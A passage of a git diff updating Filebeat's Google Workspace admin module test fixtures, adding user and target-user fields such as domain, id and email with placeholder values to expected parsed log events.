"2020-10-02T15:00:00.000Z", @@ -1541,7 +1649,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1594,6 +1708,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json index cb63268bf24f..efb0d4fefd70 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json @@ -48,7 +48,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -100,7 +103,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -151,7 +157,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -204,7 +213,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -253,7 +265,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -302,7 +317,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -351,7 +369,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -400,7 +421,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -449,7 +473,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -500,7 +527,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -549,7 +579,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -598,7 +631,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -647,7 +683,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -697,7 +736,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -747,7 +789,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -796,7 +841,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -851,6 +899,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json index d3e6ddbea996..38b52a4fde71 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-security-test.json.log-expected.json @@ -49,7 +49,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -100,7 +103,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -151,7 +157,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -205,7 +214,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -257,7 +269,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -309,7 +324,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -359,7 +377,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -414,7 +435,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -469,7 +493,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -524,7 +551,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -579,7 +609,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -633,7 +666,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -682,7 +718,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -732,7 +771,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -785,7 +827,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -834,7 +879,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -883,7 +931,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -938,7 +989,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -995,7 +1049,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1047,7 +1104,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1102,7 +1162,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1155,7 +1218,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1206,7 +1272,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1256,6 +1325,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json index aa6e0b98b67f..23436a2de5fc 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-sites-test.json.log-expected.json @@ -51,7 +51,10 @@ "forwarded" ], "url.full": "http://example.com/path/in/url", - "url.path": "/path/in/url" + "url.path": "/path/in/url", + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -105,7 +108,10 @@ "forwarded" ], "url.full": "http://example.com/path/in/url", - "url.path": "/path/in/url" + "url.path": "/path/in/url", + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -159,7 +165,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -211,7 +220,10 @@ "forwarded" ], "url.full": "http://example.com/path/in/url", - "url.path": "/path/in/url" + "url.path": "/path/in/url", + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -260,6 +272,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json index a04a9e8490b4..0d31e53291c6 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-user-test.json.log-expected.json @@ -48,7 +48,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -99,7 +105,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -152,7 +164,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -204,7 +222,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -255,7 +279,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -306,7 +336,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -357,7 +393,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -408,7 +450,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -460,7 +508,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -512,7 +566,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -563,7 +623,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -615,7 +678,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -667,7 +736,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -721,7 +796,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -774,7 +855,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -827,7 +914,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -880,7 +973,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -933,7 +1032,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -986,7 +1091,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1039,7 +1150,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1092,7 +1209,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1145,7 +1268,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1198,7 +1327,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1249,7 +1384,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1300,7 +1441,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1353,7 +1500,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1406,7 +1559,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1465,7 +1624,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1518,7 +1683,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1570,7 +1741,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1622,7 +1799,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1674,7 +1857,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1726,7 +1915,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1779,7 +1974,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1831,7 +2032,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1884,7 +2091,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1936,7 +2149,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1988,7 +2207,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2040,7 +2265,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2092,7 +2323,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2143,7 +2380,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2196,7 +2439,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2244,7 +2493,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2295,7 +2547,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2346,7 +2604,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2397,7 +2661,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2454,7 +2724,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2506,7 +2782,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2557,7 +2839,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2608,7 +2896,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2659,7 +2953,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2711,7 +3011,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2763,7 +3069,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2814,7 +3126,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2865,7 +3183,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2916,7 +3240,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2967,7 +3297,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3019,7 +3355,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3070,7 +3412,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3121,7 +3469,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3172,7 +3526,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3223,7 +3583,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3271,7 +3637,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + 